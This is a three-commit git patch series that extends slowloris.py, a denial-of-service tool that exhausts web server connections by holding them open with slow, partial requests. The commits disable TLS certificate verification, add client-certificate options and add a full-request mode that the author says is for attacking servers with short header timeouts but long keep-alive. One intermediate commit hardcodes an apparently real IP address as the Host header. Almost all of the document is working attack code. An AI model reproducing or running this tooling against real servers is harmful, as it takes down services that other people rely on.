From f27c838ba43551d0f2d4ce23a2245ec54511d54c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Karol=20Celi=C5=84ski?= Date: Fri, 30 Apr 2021 11:20:48 +0200 Subject: [PATCH 1/3] Now slowloris works with untrusted/invalid certificate. --- slowloris.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/slowloris.py b/slowloris.py index 554a503..2f07130 100755 --- a/slowloris.py +++ b/slowloris.py @@ -159,6 +159,8 @@ def init_socket(ip): if args.https: ctx = ssl.create_default_context() + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE s = ctx.wrap_socket(s, server_hostname=args.host) s.connect((ip, args.port)) From b2b1bc639075731a9e3b319cb7825f46c8be6d3a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Karol=20Celi=C5=84ski?= Date: Sat, 1 May 2021 00:46:41 +0200 Subject: [PATCH 2/3] Support for client certificate and full requests mode. --- slowloris.py | 49 ++++++++++++++++++++++++++++++++++++++++++++----- 1 file changed, 44 insertions(+), 5 deletions(-) diff --git a/slowloris.py b/slowloris.py index 2f07130..22234bd 100755 --- a/slowloris.py +++ b/slowloris.py @@ -51,7 +51,28 @@ "--https", dest="https", action="store_true", - help="Use HTTPS for the requests", + help="use https for the requests", +) +parser.add_argument( + "--cert", + help="Use SSL client certificate (PEM)", + default=None, +) +parser.add_argument( + "--key", + help="Use SSL client private key (PEM)", + default=None, +) +parser.add_argument( + "--password", + help="Password for private key", + default="", +) +parser.add_argument( + "--makerequest", + dest="makerequest", + action="store_true", + help="Send full http request", ) parser.add_argument( "--sleeptime", @@ -75,6 +96,8 @@ parser.print_help() sys.exit(1) + + if args.useproxy: # Tries to import to external "socks" library # and monkey patches socket.socket to connect over @@ -103,6 +126,13 @@ level=logging.INFO, ) +if None not in [args.cert, args.key]: + if args.cert is None or args.key is None: + print("Supplu both parameters (--cert --key) for connection with client certificate !") + else: + logging.info("Using client certificate.") + + def send_line(self, line): line = f"{line}\r\n" @@ -152,7 +182,6 @@ def send_header(self, name, value): setattr(socket.socket, "send_line", send_line) setattr(socket.socket, "send_header", send_header) - def init_socket(ip): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) @@ -161,18 +190,22 @@ def init_socket(ip): ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE + if None not in [args.cert, args.key]: + ctx.load_cert_chain(args.cert, args.key, args.password) s = ctx.wrap_socket(s, server_hostname=args.host) s.connect((ip, args.port)) - s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1") + s.send_line(f"GET / HTTP/1.1") ua = user_agents[0] if args.randuseragent: ua = random.choice(user_agents) s.send_header("User-Agent", ua) - s.send_header("Accept-language", "en-US,en,q=0.5") + s.send_header("Host", args.host) + if args.makerequest: + s.send_line("\r\n\r\n") return s @@ -199,8 +232,14 @@ def main(): ) for s in list(list_of_sockets): try: + if args.makerequest: + s.send("\r\n\r\n".encode("utf-8")) + s.send("GET / HTTP/1.1\r\n".encode("utf-8")) + s.send("Host: 34.118.77.60\r\n".encode("utf-8")) s.send_header("X-a", random.randint(1, 5000)) - except socket.error: + + except socket.error as e: + print(e) list_of_sockets.remove(s) for _ in range(socket_count - len(list_of_sockets)): From 0698fcf62ed8ba84b17a66017816bec1540c7265 Mon Sep 17 00:00:00 2001 From: Karol Celinski Date: Sat, 8 May 2021 19:56:21 +0200 Subject: [PATCH 3/3] Added SSL client certificate support and ability to attack servers with small request header/body timeout but big keep-alive --- slowloris.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/slowloris.py b/slowloris.py index 22234bd..4bafe42 100755 --- a/slowloris.py +++ b/slowloris.py @@ -72,7 +72,7 @@ "--makerequest", dest="makerequest", action="store_true", - help="Send full http request", + help="Send full http request (useful when small request body/header timeout is set but keep-alive is set)", ) parser.add_argument( "--sleeptime", @@ -128,7 +128,7 @@ if None not in [args.cert, args.key]: if args.cert is None or args.key is None: - print("Supplu both parameters (--cert --key) for connection with client certificate !") + print("Supply both parameters (--cert & --key) for connection with client certificate !") else: logging.info("Using client certificate.") @@ -196,15 +196,16 @@ def init_socket(ip): s.connect((ip, args.port)) - s.send_line(f"GET / HTTP/1.1") + s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1") ua = user_agents[0] if args.randuseragent: ua = random.choice(user_agents) s.send_header("User-Agent", ua) - s.send_header("Host", args.host) + s.send_header("Accept-language", "en-US,en,q=0.5") if args.makerequest: + s.send_header("Host", args.host) s.send_line("\r\n\r\n") return s @@ -235,11 +236,10 @@ def main(): if args.makerequest: s.send("\r\n\r\n".encode("utf-8")) s.send("GET / HTTP/1.1\r\n".encode("utf-8")) - s.send("Host: 34.118.77.60\r\n".encode("utf-8")) + s.send(f"Host: {args.host}\r\n".encode("utf-8")) s.send_header("X-a", random.randint(1, 5000)) except socket.error as e: - print(e) list_of_sockets.remove(s) for _ in range(socket_count - len(list_of_sockets)):